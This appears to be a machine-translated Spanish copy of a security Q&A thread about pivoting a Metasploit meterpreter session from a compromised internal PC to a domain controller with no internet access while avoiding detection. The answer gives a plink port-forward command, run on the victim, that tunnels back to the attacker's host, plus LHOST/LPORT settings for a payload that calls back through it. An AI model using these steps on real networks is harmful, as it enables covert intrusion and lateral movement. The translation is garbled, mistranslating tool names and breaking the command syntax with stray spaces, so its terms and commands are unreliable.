Metasploit: girando hacia la máquina sin acceso a Internet

3

Imaginemos el siguiente escenario (no infrecuente):

  • Estoy haciendo un pentest desde afuera
  • Tengo una sesión de meterpreter desde una PC de la empresa que está dentro de su infraestructura (Digamos w / reverse HTTPS)
  • Digamos que conozco el pwd del administrador de dominio [solo por brevedad ”
  • Quiero entrar en el DC
  • El DC no puede conectarse a internet

¿Cómo harías esto?

El primer desafío es poner el medidor en el DC sin ser atrapado. Mi instinto sería crear un ejecutable, firmarlo y luego ser realmente una vieja escuela: hacer un "uso de red \ DC \ c $ ..." en la máquina del medio y copiarlo. Luego, de forma remota, programar una tarea con "en". ¿Hay una manera más metasploity para hacer eso? ¿Los módulos psexec_ * funcionan incluso a través de un medidor metro de Windows?

El segundo desafío es: ¿Cómo se volvería a conectar el medidor del DC? No pude conseguir que la función de tubería con nombre de meterpreter funcione de forma confiable. MSF confirma haber recibido una sesión, luego el proceso de meterpreter en la máquina en el medio se bloquea. Ups [Editar: solo se bloquea cuando la máquina central utiliza reverse_HTTPS. Funciona con reverse_tcp, con el bloqueo impar que deja el proceso prolongado. Presenté un informe de error. Actualmente no estoy convencido de que esté listo para la producción]

¿Reenvío de puertos? El puerto de la máquina central se retira y el DC se conecta a través de la máquina central hacia mí. HTTPS? ¿Está bien abrir nuevos puertos en computadoras en 2018?

¿Cuál es el camino para este escenario que funciona y no dispara todas las alarmas?

    
pregunta manduca 21.04.2018 - 20:59
fuente

1 respuesta

1

"Hack Naked": asegúrate de que no tengas ningún problema de cortafuegos porque solo puedes obtener 1 disparo. Averigüe la complejidad de obtener puertos reenviados a su máquina. Creo que esto debería hacerlo ... pero requiere una prueba una vez que estás dentro para asegurarte de que puedes asegurar la conectividad.

  1. Configure reenvío de puerto local en la PC víctima con plink. (asumiendo ventanas)

    • La víctima escucha el 53 o lo que quieras (usando 53 como ejemplo)
    • La víctima se reenvía a su host en el puerto XYZ
    • Si usa msf o nc, configure el oyente.
    • En Víctima: plink -batch -l root -pw {contraseña} yourip -p {22} -L 53: 127.0.0.1: 4444
    • Puse {22} entre llaves porque no está seguro si puede abrir el puerto 22 en ese puerto. Las reglas de egreso pueden no permitir ssh saliente. Especialmente si se trata de una tienda solo para MS. Puede acumular su cerebro en la redirección de iptables para un puerto específico a 22, o simplemente agregar el puerto de escucha a sshd_config. Recordar restaurar los valores predeterminados más tarde.
  2. Debería configurar su carga útil para conectarse al puerto abierto en la PC víctima ... confía en el túnel de reenvío de puertos en el puerto 53 de víctimas que se recibirá en el puerto local de su sistema 4444.

    • LHOST = víctima interna ip
    • LPORT = 53
  3. Asegúrese de verificar la conectividad y luego entregue su carga útil / ejecute

respondido por el Steve Kline 22.04.2018 - 06:46
fuente

Lea otras preguntas en las etiquetas